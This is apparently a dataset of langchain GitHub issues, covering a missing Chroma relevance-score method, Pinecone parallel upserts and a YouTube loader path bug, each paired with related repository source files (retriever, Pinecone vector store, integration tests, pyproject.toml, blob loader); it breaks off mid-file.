closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 3,685 | TimeWeightedVectorStoreRetriever (TWVSR) and ChromaDb vector store - base.py | Hi there.
Realise there is a lot happening and this this looks to be something that has been missed. When trying to use TWVSR with ChromaDb it errors because of the lack of implementation of the following, namely __similarity_search_with_relevance_scores, inside of base.py
`def _similarity_search_with_relevance_scores(
self,
query: str,
k: int = 4,
**kwargs: Any,
) -> List[Tuple[Document, float]]:
"""Return docs and relevance scores, normalized on a scale from 0 to 1.
0 is dissimilar, 1 is most similar.
"""
raise NotImplementedError`
Trying to make a work-around now
Many thanks
Ian | https://github.com/langchain-ai/langchain/issues/3685 | https://github.com/langchain-ai/langchain/pull/9906 | bc8cceebf7b2d8e056b905926a6009367b6a8b14 | 4dc47bd3acc8928359773fc3fb80d289b9eae55e | "2023-04-28T00:16:05Z" | python | "2023-09-03T22:05:30Z" | libs/langchain/langchain/retrievers/time_weighted_retriever.py | import datetime
from copy import deepcopy
from typing import Any, Dict, List, Optional, Tuple
from langchain.callbacks.manager import CallbackManagerForRetrieverRun
from langchain.pydantic_v1 import Field
from langchain.schema import BaseRetriever, Document
from langchain.vectorstores.base import VectorStore
def _get_hours_passed(time: datetime.datetime, ref_time: datetime.datetime) -> float:
"""Get the hours passed between two datetimes."""
return (time - ref_time).total_seconds() / 3600
class TimeWeightedVectorStoreRetriever(BaseRetriever):
"""Retriever that combines embedding similarity with
recency in retrieving values."""
vectorstore: VectorStore
"""The vectorstore to store documents and determine salience."""
search_kwargs: dict = Field(default_factory=lambda: dict(k=100))
"""Keyword arguments to pass to the vectorstore similarity search."""
# TODO: abstract as a queue
memory_stream: List[Document] = Field(default_factory=list)
"""The memory_stream of documents to search through."""
decay_rate: float = Field(default=0.01)
"""The exponential decay factor used as (1.0-decay_rate)**(hrs_passed)."""
k: int = 4
"""The maximum number of documents to retrieve in a given call."""
other_score_keys: List[str] = []
"""Other keys in the metadata to factor into the score, e.g. 'importance'."""
default_salience: Optional[float] = None
"""The salience to assign memories not retrieved from the vector store.
None assigns no salience to documents not fetched from the vector store.
"""
class Config:
"""Configuration for this pydantic object."""
arbitrary_types_allowed = True
def _get_combined_score(
self,
document: Document,
vector_relevance: Optional[float],
current_time: datetime.datetime,
) -> float:
"""Return the combined score for a document."""
hours_passed = _get_hours_passed(
current_time,
document.metadata["last_accessed_at"],
)
score = (1.0 - self.decay_rate) ** hours_passed
for key in self.other_score_keys:
if key in document.metadata:
score += document.metadata[key]
if vector_relevance is not None:
score += vector_relevance
return score
def get_salient_docs(self, query: str) -> Dict[int, Tuple[Document, float]]:
"""Return documents that are salient to the query."""
docs_and_scores: List[Tuple[Document, float]]
docs_and_scores = self.vectorstore.similarity_search_with_relevance_scores(
query, **self.search_kwargs
)
results = {}
for fetched_doc, relevance in docs_and_scores:
if "buffer_idx" in fetched_doc.metadata:
buffer_idx = fetched_doc.metadata["buffer_idx"]
doc = self.memory_stream[buffer_idx]
results[buffer_idx] = (doc, relevance)
return results
def _get_relevant_documents(
self, query: str, *, run_manager: CallbackManagerForRetrieverRun
) -> List[Document]:
"""Return documents that are relevant to the query."""
current_time = datetime.datetime.now()
docs_and_scores = {
doc.metadata["buffer_idx"]: (doc, self.default_salience)
for doc in self.memory_stream[-self.k :]
}
# If a doc is considered salient, update the salience score
docs_and_scores.update(self.get_salient_docs(query))
rescored_docs = [
(doc, self._get_combined_score(doc, relevance, current_time))
for doc, relevance in docs_and_scores.values()
]
rescored_docs.sort(key=lambda x: x[1], reverse=True)
result = []
# Ensure frequently accessed memories aren't forgotten
for doc, _ in rescored_docs[: self.k]:
# TODO: Update vector store doc once `update` method is exposed.
buffered_doc = self.memory_stream[doc.metadata["buffer_idx"]]
buffered_doc.metadata["last_accessed_at"] = current_time
result.append(buffered_doc)
return result
def add_documents(self, documents: List[Document], **kwargs: Any) -> List[str]:
"""Add documents to vectorstore."""
current_time = kwargs.get("current_time")
if current_time is None:
current_time = datetime.datetime.now()
# Avoid mutating input documents
dup_docs = [deepcopy(d) for d in documents]
for i, doc in enumerate(dup_docs):
if "last_accessed_at" not in doc.metadata:
doc.metadata["last_accessed_at"] = current_time
if "created_at" not in doc.metadata:
doc.metadata["created_at"] = current_time
doc.metadata["buffer_idx"] = len(self.memory_stream) + i
self.memory_stream.extend(dup_docs)
return self.vectorstore.add_documents(dup_docs, **kwargs)
async def aadd_documents(
self, documents: List[Document], **kwargs: Any
) -> List[str]:
"""Add documents to vectorstore."""
current_time = kwargs.get("current_time")
if current_time is None:
current_time = datetime.datetime.now()
# Avoid mutating input documents
dup_docs = [deepcopy(d) for d in documents]
for i, doc in enumerate(dup_docs):
if "last_accessed_at" not in doc.metadata:
doc.metadata["last_accessed_at"] = current_time
if "created_at" not in doc.metadata:
doc.metadata["created_at"] = current_time
doc.metadata["buffer_idx"] = len(self.memory_stream) + i
self.memory_stream.extend(dup_docs)
return await self.vectorstore.aadd_documents(dup_docs, **kwargs)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 9,855 | Support index upsert parallelization for pinecone | ### Feature request
We can take advantage from pinecone parallel upsert (see example: https://docs.pinecone.io/docs/insert-data#sending-upserts-in-parallel)
This will require modification of the current `from_texts` pipeline to
1. Create a batch (chunk) for doing embeddings (ie have a chunk size of 1000 for embeddings)
2. Perform a parallel upsert to Pinecone index on that chunk
This way we are in control on 3 things:
1. Thread pool for pinecone index
2. Parametrize the batch size for embeddings (ie it helps to avoid rate limit for OpenAI embeddings)
3. Parametrize the batch size for upsert (it helps to avoid throttling of pinecone API)
As a part of this ticket, we can consolidate the code between `add_texts` and `from_texts` as they are doing the similar thing.
### Motivation
The function `from_text` and `add_text` for index upsert doesn't take advantage of parallelism especially when embeddings are calculated by HTTP calls (ie OpenAI embeddings). This makes the whole sequence inefficient from IO bound standpoint as the pipeline is following:
1. Take a small batch ie 32/64 of documents
2. Calculate embeddings --> WAIT
3. Upsert a batch --> WAIT
We can benefit from either parallel upsert or we can utilize `asyncio`.
### Your contribution
I will do it. | https://github.com/langchain-ai/langchain/issues/9855 | https://github.com/langchain-ai/langchain/pull/9859 | 16a27ab244e6b92d74c48c206e0e6f1b5d00e126 | 4765c097035b9ff722fa9bbb7c3dd4eb6aed933c | "2023-08-28T13:09:29Z" | python | "2023-09-03T22:37:41Z" | libs/langchain/langchain/vectorstores/pinecone.py | from __future__ import annotations
import logging
import uuid
import warnings
from typing import Any, Callable, Iterable, List, Optional, Tuple, Union
import numpy as np
from langchain.docstore.document import Document
from langchain.embeddings.base import Embeddings
from langchain.vectorstores.base import VectorStore
from langchain.vectorstores.utils import DistanceStrategy, maximal_marginal_relevance
logger = logging.getLogger(__name__)
class Pinecone(VectorStore):
"""`Pinecone` vector store.
To use, you should have the ``pinecone-client`` python package installed.
Example:
.. code-block:: python
from langchain.vectorstores import Pinecone
from langchain.embeddings.openai import OpenAIEmbeddings
import pinecone
# The environment should be the one specified next to the API key
# in your Pinecone console
pinecone.init(api_key="***", environment="...")
index = pinecone.Index("langchain-demo")
embeddings = OpenAIEmbeddings()
vectorstore = Pinecone(index, embeddings.embed_query, "text")
"""
def __init__(
self,
index: Any,
embedding: Union[Embeddings, Callable],
text_key: str,
namespace: Optional[str] = None,
distance_strategy: Optional[DistanceStrategy] = DistanceStrategy.COSINE,
):
"""Initialize with Pinecone client."""
try:
import pinecone
except ImportError:
raise ImportError(
"Could not import pinecone python package. "
"Please install it with `pip install pinecone-client`."
)
if not isinstance(index, pinecone.index.Index):
raise ValueError(
f"client should be an instance of pinecone.index.Index, "
f"got {type(index)}"
)
if not isinstance(embedding, Embeddings):
warnings.warn(
"Passing in `embedding` as a Callable is deprecated. Please pass in an"
" Embeddings object instead."
)
self._index = index
self._embedding = embedding
self._text_key = text_key
self._namespace = namespace
self.distance_strategy = distance_strategy
@property
def embeddings(self) -> Optional[Embeddings]:
"""Access the query embedding object if available."""
if isinstance(self._embedding, Embeddings):
return self._embedding
return None
def _embed_documents(self, texts: Iterable[str]) -> List[List[float]]:
"""Embed search docs."""
if isinstance(self._embedding, Embeddings):
return self._embedding.embed_documents(list(texts))
return [self._embedding(t) for t in texts]
def _embed_query(self, text: str) -> List[float]:
"""Embed query text."""
if isinstance(self._embedding, Embeddings):
return self._embedding.embed_query(text)
return self._embedding(text)
def add_texts(
self,
texts: Iterable[str],
metadatas: Optional[List[dict]] = None,
ids: Optional[List[str]] = None,
namespace: Optional[str] = None,
batch_size: int = 32,
**kwargs: Any,
) -> List[str]:
"""Run more texts through the embeddings and add to the vectorstore.
Args:
texts: Iterable of strings to add to the vectorstore.
metadatas: Optional list of metadatas associated with the texts.
ids: Optional list of ids to associate with the texts.
namespace: Optional pinecone namespace to add the texts to.
Returns:
List of ids from adding the texts into the vectorstore.
"""
if namespace is None:
namespace = self._namespace
# Embed and create the documents
docs = []
ids = ids or [str(uuid.uuid4()) for _ in texts]
embeddings = self._embed_documents(texts)
for i, (text, embedding) in enumerate(zip(texts, embeddings)):
metadata = metadatas[i] if metadatas else {}
metadata[self._text_key] = text
docs.append((ids[i], embedding, metadata))
# upsert to Pinecone
self._index.upsert(
vectors=docs, namespace=namespace, batch_size=batch_size, **kwargs
)
return ids
def similarity_search_with_score(
self,
query: str,
k: int = 4,
filter: Optional[dict] = None,
namespace: Optional[str] = None,
) -> List[Tuple[Document, float]]:
"""Return pinecone documents most similar to query, along with scores.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
filter: Dictionary of argument(s) to filter on metadata
namespace: Namespace to search in. Default will search in '' namespace.
Returns:
List of Documents most similar to the query and score for each
"""
return self.similarity_search_by_vector_with_score(
self._embed_query(query), k=k, filter=filter, namespace=namespace
)
def similarity_search_by_vector_with_score(
self,
embedding: List[float],
*,
k: int = 4,
filter: Optional[dict] = None,
namespace: Optional[str] = None,
) -> List[Tuple[Document, float]]:
"""Return pinecone documents most similar to embedding, along with scores."""
if namespace is None:
namespace = self._namespace
docs = []
results = self._index.query(
[embedding],
top_k=k,
include_metadata=True,
namespace=namespace,
filter=filter,
)
for res in results["matches"]:
metadata = res["metadata"]
if self._text_key in metadata:
text = metadata.pop(self._text_key)
score = res["score"]
docs.append((Document(page_content=text, metadata=metadata), score))
else:
logger.warning(
f"Found document with no `{self._text_key}` key. Skipping."
)
return docs
def similarity_search(
self,
query: str,
k: int = 4,
filter: Optional[dict] = None,
namespace: Optional[str] = None,
**kwargs: Any,
) -> List[Document]:
"""Return pinecone documents most similar to query.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
filter: Dictionary of argument(s) to filter on metadata
namespace: Namespace to search in. Default will search in '' namespace.
Returns:
List of Documents most similar to the query and score for each
"""
docs_and_scores = self.similarity_search_with_score(
query, k=k, filter=filter, namespace=namespace, **kwargs
)
return [doc for doc, _ in docs_and_scores]
def _select_relevance_score_fn(self) -> Callable[[float], float]:
"""
The 'correct' relevance function
may differ depending on a few things, including:
- the distance / similarity metric used by the VectorStore
- the scale of your embeddings (OpenAI's are unit normed. Many others are not!)
- embedding dimensionality
- etc.
"""
if self.distance_strategy == DistanceStrategy.COSINE:
return self._cosine_relevance_score_fn
elif self.distance_strategy == DistanceStrategy.MAX_INNER_PRODUCT:
return self._max_inner_product_relevance_score_fn
elif self.distance_strategy == DistanceStrategy.EUCLIDEAN_DISTANCE:
return self._euclidean_relevance_score_fn
else:
raise ValueError(
"Unknown distance strategy, must be cosine, max_inner_product "
"(dot product), or euclidean"
)
def max_marginal_relevance_search_by_vector(
self,
embedding: List[float],
k: int = 4,
fetch_k: int = 20,
lambda_mult: float = 0.5,
filter: Optional[dict] = None,
namespace: Optional[str] = None,
**kwargs: Any,
) -> List[Document]:
"""Return docs selected using the maximal marginal relevance.
Maximal marginal relevance optimizes for similarity to query AND diversity
among selected documents.
Args:
embedding: Embedding to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
fetch_k: Number of Documents to fetch to pass to MMR algorithm.
lambda_mult: Number between 0 and 1 that determines the degree
of diversity among the results with 0 corresponding
to maximum diversity and 1 to minimum diversity.
Defaults to 0.5.
Returns:
List of Documents selected by maximal marginal relevance.
"""
if namespace is None:
namespace = self._namespace
results = self._index.query(
[embedding],
top_k=fetch_k,
include_values=True,
include_metadata=True,
namespace=namespace,
filter=filter,
)
mmr_selected = maximal_marginal_relevance(
np.array([embedding], dtype=np.float32),
[item["values"] for item in results["matches"]],
k=k,
lambda_mult=lambda_mult,
)
selected = [results["matches"][i]["metadata"] for i in mmr_selected]
return [
Document(page_content=metadata.pop((self._text_key)), metadata=metadata)
for metadata in selected
]
def max_marginal_relevance_search(
self,
query: str,
k: int = 4,
fetch_k: int = 20,
lambda_mult: float = 0.5,
filter: Optional[dict] = None,
namespace: Optional[str] = None,
**kwargs: Any,
) -> List[Document]:
"""Return docs selected using the maximal marginal relevance.
Maximal marginal relevance optimizes for similarity to query AND diversity
among selected documents.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
fetch_k: Number of Documents to fetch to pass to MMR algorithm.
lambda_mult: Number between 0 and 1 that determines the degree
of diversity among the results with 0 corresponding
to maximum diversity and 1 to minimum diversity.
Defaults to 0.5.
Returns:
List of Documents selected by maximal marginal relevance.
"""
embedding = self._embed_query(query)
return self.max_marginal_relevance_search_by_vector(
embedding, k, fetch_k, lambda_mult, filter, namespace
)
@classmethod
def from_texts(
cls,
texts: List[str],
embedding: Embeddings,
metadatas: Optional[List[dict]] = None,
ids: Optional[List[str]] = None,
batch_size: int = 32,
text_key: str = "text",
index_name: Optional[str] = None,
namespace: Optional[str] = None,
upsert_kwargs: Optional[dict] = None,
**kwargs: Any,
) -> Pinecone:
"""Construct Pinecone wrapper from raw documents.
This is a user friendly interface that:
1. Embeds documents.
2. Adds the documents to a provided Pinecone index
This is intended to be a quick way to get started.
Example:
.. code-block:: python
from langchain import Pinecone
from langchain.embeddings import OpenAIEmbeddings
import pinecone
# The environment should be the one specified next to the API key
# in your Pinecone console
pinecone.init(api_key="***", environment="...")
embeddings = OpenAIEmbeddings()
pinecone = Pinecone.from_texts(
texts,
embeddings,
index_name="langchain-demo"
)
"""
try:
import pinecone
except ImportError:
raise ValueError(
"Could not import pinecone python package. "
"Please install it with `pip install pinecone-client`."
)
indexes = pinecone.list_indexes() # checks if provided index exists
if index_name in indexes:
index = pinecone.Index(index_name)
elif len(indexes) == 0:
raise ValueError(
"No active indexes found in your Pinecone project, "
"are you sure you're using the right API key and environment?"
)
else:
raise ValueError(
f"Index '{index_name}' not found in your Pinecone project. "
f"Did you mean one of the following indexes: {', '.join(indexes)}"
)
for i in range(0, len(texts), batch_size):
# set end position of batch
i_end = min(i + batch_size, len(texts))
# get batch of texts and ids
lines_batch = texts[i:i_end]
# create ids if not provided
if ids:
ids_batch = ids[i:i_end]
else:
ids_batch = [str(uuid.uuid4()) for n in range(i, i_end)]
# create embeddings
embeds = embedding.embed_documents(lines_batch)
# prep metadata and upsert batch
if metadatas:
metadata = metadatas[i:i_end]
else:
metadata = [{} for _ in range(i, i_end)]
for j, line in enumerate(lines_batch):
metadata[j][text_key] = line
to_upsert = zip(ids_batch, embeds, metadata)
# upsert to Pinecone
_upsert_kwargs = upsert_kwargs or {}
index.upsert(vectors=list(to_upsert), namespace=namespace, **_upsert_kwargs)
return cls(index, embedding, text_key, namespace, **kwargs)
@classmethod
def from_existing_index(
cls,
index_name: str,
embedding: Embeddings,
text_key: str = "text",
namespace: Optional[str] = None,
) -> Pinecone:
"""Load pinecone vectorstore from index name."""
try:
import pinecone
except ImportError:
raise ValueError(
"Could not import pinecone python package. "
"Please install it with `pip install pinecone-client`."
)
return cls(pinecone.Index(index_name), embedding, text_key, namespace)
def delete(
self,
ids: Optional[List[str]] = None,
delete_all: Optional[bool] = None,
namespace: Optional[str] = None,
filter: Optional[dict] = None,
**kwargs: Any,
) -> None:
"""Delete by vector IDs or filter.
Args:
ids: List of ids to delete.
filter: Dictionary of conditions to filter vectors to delete.
"""
if namespace is None:
namespace = self._namespace
if delete_all:
self._index.delete(delete_all=True, namespace=namespace, **kwargs)
elif ids is not None:
chunk_size = 1000
for i in range(0, len(ids), chunk_size):
chunk = ids[i : i + chunk_size]
self._index.delete(ids=chunk, namespace=namespace, **kwargs)
elif filter is not None:
self._index.delete(filter=filter, namespace=namespace, **kwargs)
else:
raise ValueError("Either ids, delete_all, or filter must be provided.")
return None
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 9,855 | Support index upsert parallelization for pinecone | ### Feature request
We can take advantage from pinecone parallel upsert (see example: https://docs.pinecone.io/docs/insert-data#sending-upserts-in-parallel)
This will require modification of the current `from_texts` pipeline to
1. Create a batch (chunk) for doing embeddings (ie have a chunk size of 1000 for embeddings)
2. Perform a parallel upsert to Pinecone index on that chunk
This way we are in control on 3 things:
1. Thread pool for pinecone index
2. Parametrize the batch size for embeddings (ie it helps to avoid rate limit for OpenAI embeddings)
3. Parametrize the batch size for upsert (it helps to avoid throttling of pinecone API)
As a part of this ticket, we can consolidate the code between `add_texts` and `from_texts` as they are doing the similar thing.
### Motivation
The function `from_text` and `add_text` for index upsert doesn't take advantage of parallelism especially when embeddings are calculated by HTTP calls (ie OpenAI embeddings). This makes the whole sequence inefficient from IO bound standpoint as the pipeline is following:
1. Take a small batch ie 32/64 of documents
2. Calculate embeddings --> WAIT
3. Upsert a batch --> WAIT
We can benefit from either parallel upsert or we can utilize `asyncio`.
### Your contribution
I will do it. | https://github.com/langchain-ai/langchain/issues/9855 | https://github.com/langchain-ai/langchain/pull/9859 | 16a27ab244e6b92d74c48c206e0e6f1b5d00e126 | 4765c097035b9ff722fa9bbb7c3dd4eb6aed933c | "2023-08-28T13:09:29Z" | python | "2023-09-03T22:37:41Z" | libs/langchain/tests/integration_tests/vectorstores/test_pinecone.py | import importlib
import os
import time
import uuid
from typing import TYPE_CHECKING, List
import numpy as np
import pytest
from langchain.docstore.document import Document
from langchain.embeddings import OpenAIEmbeddings
from langchain.vectorstores.pinecone import Pinecone
if TYPE_CHECKING:
import pinecone
index_name = "langchain-test-index" # name of the index
namespace_name = "langchain-test-namespace" # name of the namespace
dimension = 1536 # dimension of the embeddings
def reset_pinecone() -> None:
assert os.environ.get("PINECONE_API_KEY") is not None
assert os.environ.get("PINECONE_ENVIRONMENT") is not None
import pinecone
importlib.reload(pinecone)
pinecone.init(
api_key=os.environ.get("PINECONE_API_KEY"),
environment=os.environ.get("PINECONE_ENVIRONMENT"),
)
class TestPinecone:
index: "pinecone.Index"
@classmethod
def setup_class(cls) -> None:
import pinecone
reset_pinecone()
cls.index = pinecone.Index(index_name)
if index_name in pinecone.list_indexes():
index_stats = cls.index.describe_index_stats()
if index_stats["dimension"] == dimension:
# delete all the vectors in the index if the dimension is the same
# from all namespaces
index_stats = cls.index.describe_index_stats()
for _namespace_name in index_stats["namespaces"].keys():
cls.index.delete(delete_all=True, namespace=_namespace_name)
else:
pinecone.delete_index(index_name)
pinecone.create_index(name=index_name, dimension=dimension)
else:
pinecone.create_index(name=index_name, dimension=dimension)
# insure the index is empty
index_stats = cls.index.describe_index_stats()
assert index_stats["dimension"] == dimension
if index_stats["namespaces"].get(namespace_name) is not None:
assert index_stats["namespaces"][namespace_name]["vector_count"] == 0
@classmethod
def teardown_class(cls) -> None:
index_stats = cls.index.describe_index_stats()
for _namespace_name in index_stats["namespaces"].keys():
cls.index.delete(delete_all=True, namespace=_namespace_name)
reset_pinecone()
@pytest.fixture(autouse=True)
def setup(self) -> None:
# delete all the vectors in the index
index_stats = self.index.describe_index_stats()
for _namespace_name in index_stats["namespaces"].keys():
self.index.delete(delete_all=True, namespace=_namespace_name)
reset_pinecone()
@pytest.mark.vcr()
def test_from_texts(
self, texts: List[str], embedding_openai: OpenAIEmbeddings
) -> None:
"""Test end to end construction and search."""
unique_id = uuid.uuid4().hex
needs = f"foobuu {unique_id} booo"
texts.insert(0, needs)
docsearch = Pinecone.from_texts(
texts=texts,
embedding=embedding_openai,
index_name=index_name,
namespace=namespace_name,
)
output = docsearch.similarity_search(unique_id, k=1, namespace=namespace_name)
assert output == [Document(page_content=needs)]
@pytest.mark.vcr()
def test_from_texts_with_metadatas(
self, texts: List[str], embedding_openai: OpenAIEmbeddings
) -> None:
"""Test end to end construction and search."""
unique_id = uuid.uuid4().hex
needs = f"foobuu {unique_id} booo"
texts.insert(0, needs)
metadatas = [{"page": i} for i in range(len(texts))]
docsearch = Pinecone.from_texts(
texts,
embedding_openai,
index_name=index_name,
metadatas=metadatas,
namespace=namespace_name,
)
output = docsearch.similarity_search(needs, k=1, namespace=namespace_name)
# TODO: why metadata={"page": 0.0}) instead of {"page": 0}?
assert output == [Document(page_content=needs, metadata={"page": 0.0})]
@pytest.mark.vcr()
def test_from_texts_with_scores(self, embedding_openai: OpenAIEmbeddings) -> None:
"""Test end to end construction and search with scores and IDs."""
texts = ["foo", "bar", "baz"]
metadatas = [{"page": i} for i in range(len(texts))]
docsearch = Pinecone.from_texts(
texts,
embedding_openai,
index_name=index_name,
metadatas=metadatas,
namespace=namespace_name,
)
output = docsearch.similarity_search_with_score(
"foo", k=3, namespace=namespace_name
)
docs = [o[0] for o in output]
scores = [o[1] for o in output]
sorted_documents = sorted(docs, key=lambda x: x.metadata["page"])
# TODO: why metadata={"page": 0.0}) instead of {"page": 0}, etc???
assert sorted_documents == [
Document(page_content="foo", metadata={"page": 0.0}),
Document(page_content="bar", metadata={"page": 1.0}),
Document(page_content="baz", metadata={"page": 2.0}),
]
assert scores[0] > scores[1] > scores[2]
def test_from_existing_index_with_namespaces(
self, embedding_openai: OpenAIEmbeddings
) -> None:
"""Test that namespaces are properly handled."""
# Create two indexes with the same name but different namespaces
texts_1 = ["foo", "bar", "baz"]
metadatas = [{"page": i} for i in range(len(texts_1))]
Pinecone.from_texts(
texts_1,
embedding_openai,
index_name=index_name,
metadatas=metadatas,
namespace=f"{index_name}-1",
)
texts_2 = ["foo2", "bar2", "baz2"]
metadatas = [{"page": i} for i in range(len(texts_2))]
Pinecone.from_texts(
texts_2,
embedding_openai,
index_name=index_name,
metadatas=metadatas,
namespace=f"{index_name}-2",
)
# Search with namespace
docsearch = Pinecone.from_existing_index(
index_name=index_name,
embedding=embedding_openai,
namespace=f"{index_name}-1",
)
output = docsearch.similarity_search("foo", k=20, namespace=f"{index_name}-1")
# check that we don't get results from the other namespace
page_contents = sorted(set([o.page_content for o in output]))
assert all(content in ["foo", "bar", "baz"] for content in page_contents)
assert all(content not in ["foo2", "bar2", "baz2"] for content in page_contents)
def test_add_documents_with_ids(
self, texts: List[str], embedding_openai: OpenAIEmbeddings
) -> None:
ids = [uuid.uuid4().hex for _ in range(len(texts))]
Pinecone.from_texts(
texts=texts,
ids=ids,
embedding=embedding_openai,
index_name=index_name,
namespace=index_name,
)
index_stats = self.index.describe_index_stats()
assert index_stats["namespaces"][index_name]["vector_count"] == len(texts)
ids_1 = [uuid.uuid4().hex for _ in range(len(texts))]
Pinecone.from_texts(
texts=texts,
ids=ids_1,
embedding=embedding_openai,
index_name=index_name,
namespace=index_name,
)
index_stats = self.index.describe_index_stats()
assert index_stats["namespaces"][index_name]["vector_count"] == len(texts) * 2
assert index_stats["total_vector_count"] == len(texts) * 2
@pytest.mark.vcr()
def test_relevance_score_bound(self, embedding_openai: OpenAIEmbeddings) -> None:
"""Ensures all relevance scores are between 0 and 1."""
texts = ["foo", "bar", "baz"]
metadatas = [{"page": i} for i in range(len(texts))]
docsearch = Pinecone.from_texts(
texts,
embedding_openai,
index_name=index_name,
metadatas=metadatas,
)
# wait for the index to be ready
time.sleep(20)
output = docsearch.similarity_search_with_relevance_scores("foo", k=3)
assert all(
(1 >= score or np.isclose(score, 1)) and score >= 0 for _, score in output
)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 9,855 | Support index upsert parallelization for pinecone | ### Feature request
We can take advantage from pinecone parallel upsert (see example: https://docs.pinecone.io/docs/insert-data#sending-upserts-in-parallel)
This will require modification of the current `from_texts` pipeline to
1. Create a batch (chunk) for doing embeddings (ie have a chunk size of 1000 for embeddings)
2. Perform a parallel upsert to Pinecone index on that chunk
This way we are in control on 3 things:
1. Thread pool for pinecone index
2. Parametrize the batch size for embeddings (ie it helps to avoid rate limit for OpenAI embeddings)
3. Parametrize the batch size for upsert (it helps to avoid throttling of pinecone API)
As a part of this ticket, we can consolidate the code between `add_texts` and `from_texts` as they are doing the similar thing.
### Motivation
The function `from_text` and `add_text` for index upsert doesn't take advantage of parallelism especially when embeddings are calculated by HTTP calls (ie OpenAI embeddings). This makes the whole sequence inefficient from IO bound standpoint as the pipeline is following:
1. Take a small batch ie 32/64 of documents
2. Calculate embeddings --> WAIT
3. Upsert a batch --> WAIT
We can benefit from either parallel upsert or we can utilize `asyncio`.
### Your contribution
I will do it. | https://github.com/langchain-ai/langchain/issues/9855 | https://github.com/langchain-ai/langchain/pull/9859 | 16a27ab244e6b92d74c48c206e0e6f1b5d00e126 | 4765c097035b9ff722fa9bbb7c3dd4eb6aed933c | "2023-08-28T13:09:29Z" | python | "2023-09-03T22:37:41Z" | pyproject.toml | [tool.poetry]
name = "langchain-monorepo"
version = "0.0.1"
description = "LangChain mono-repo"
authors = []
license = "MIT"
readme = "README.md"
repository = "https://www.github.com/langchain-ai/langchain"
[tool.poetry.dependencies]
python = ">=3.8.1,<4.0"
[tool.poetry.group.docs.dependencies]
langchain = { path = "libs/langchain/", develop = true }
autodoc_pydantic = "^1.8.0"
myst_parser = "^0.18.1"
nbsphinx = "^0.8.9"
sphinx = "^4.5.0"
sphinx-autobuild = "^2021.3.14"
sphinx_book_theme = "^0.3.3"
sphinx_rtd_theme = "^1.0.0"
sphinx-typlog-theme = "^0.8.0"
sphinx-panels = "^0.6.0"
toml = "^0.10.2"
myst-nb = "^0.17.1"
linkchecker = "^10.2.1"
sphinx-copybutton = "^0.5.1"
nbdoc = "^0.0.82"
[tool.poetry.group.codespell.dependencies]
codespell = "^2.2.0"
[tool.codespell]
skip = '.git,*.pdf,*.svg,*.pdf,*.yaml,*.ipynb,poetry.lock,*.min.js,*.css,package-lock.json,example_data,_dist,examples'
# Ignore latin etc
ignore-regex = '.*(Stati Uniti|Tense=Pres).*'
# whats is a typo but used frequently in queries so kept as is
# aapply - async apply
# unsecure - typo but part of API, decided to not bother for now
ignore-words-list = 'momento,collison,ned,foor,reworkd,parth,whats,aapply,mysogyny,unsecure,damon,crate' |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,019 | fix: Loading documents from a Youtube Url | ### System Info
MacOS M2 13.4.1 (22F82)
### Who can help?
@eyurtsev
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce behaviour:
1. Run the [tutorial](https://python.langchain.com/docs/integrations/document_loaders/youtube_audio) with the default parameters `save_dir = "~/Downloads/YouTube"`
2. After calling `docs = loader.load()` the docs will be empty
I have implemented a dummy fix for the interim.
The error is here in this file: from langchain.document_loaders.blob_loaders.youtube_audio import YoutubeAudioLoader
`YouTubeAudioLoader.yield_blobs` method
loader = FileSystemBlobLoader(self.save_dir, glob="*.m4a")
```
# This doesn't always work (MacOS)
loader = FileSystemBlobLoader(self.save_dir, glob="*.m4a")
```
The reason it doesn't work is that it's trying to use ~/Downloads/YouTube.
The fix I propose is either:
- Use the FULL file path in `save_dir` in the tutorial.
- Replace the problematic line with this, so that it finds the actual directory, even if you prefer to use `~` for specifying file paths.
```
loader = FileSystemBlobLoader(os.path.expanduser(self.save_dir), glob="*.m4a")
```
### Expected behavior
There should be documents in the loader.load() variable.
### My Fix
```
# Yield the written blobs
"""
you could fix save_dir like this...
(old)
save_dir = "~/Downloads/YouTube"
(new)
"/Users/shawnesquivel/Downloads/YouTube"
"""
# This doesn't always work (MacOS)
loader = FileSystemBlobLoader(self.save_dir, glob="*.m4a")
# This works
loader = FileSystemBlobLoader(os.path.expanduser(self.save_dir), glob="*.m4a")
```
| https://github.com/langchain-ai/langchain/issues/10019 | https://github.com/langchain-ai/langchain/pull/10133 | 31bbe807583b4a53c9fd2fa98d8b4d1fe185ba40 | e0f6ba08d6ad86226552d906e397a6a21f1904d0 | "2023-08-31T03:19:25Z" | python | "2023-09-04T07:21:33Z" | libs/langchain/langchain/document_loaders/blob_loaders/file_system.py | """Use to load blobs from the local file system."""
from pathlib import Path
from typing import Callable, Iterable, Iterator, Optional, Sequence, TypeVar, Union
from langchain.document_loaders.blob_loaders.schema import Blob, BlobLoader
T = TypeVar("T")
def _make_iterator(
length_func: Callable[[], int], show_progress: bool = False
) -> Callable[[Iterable[T]], Iterator[T]]:
"""Create a function that optionally wraps an iterable in tqdm."""
if show_progress:
try:
from tqdm.auto import tqdm
except ImportError:
raise ImportError(
"You must install tqdm to use show_progress=True."
"You can install tqdm with `pip install tqdm`."
)
# Make sure to provide `total` here so that tqdm can show
# a progress bar that takes into account the total number of files.
def _with_tqdm(iterable: Iterable[T]) -> Iterator[T]:
"""Wrap an iterable in a tqdm progress bar."""
return tqdm(iterable, total=length_func())
iterator = _with_tqdm
else:
iterator = iter # type: ignore
return iterator
# PUBLIC API
class FileSystemBlobLoader(BlobLoader):
"""Load blobs in the local file system.
Example:
.. code-block:: python
from langchain.document_loaders.blob_loaders import FileSystemBlobLoader
loader = FileSystemBlobLoader("/path/to/directory")
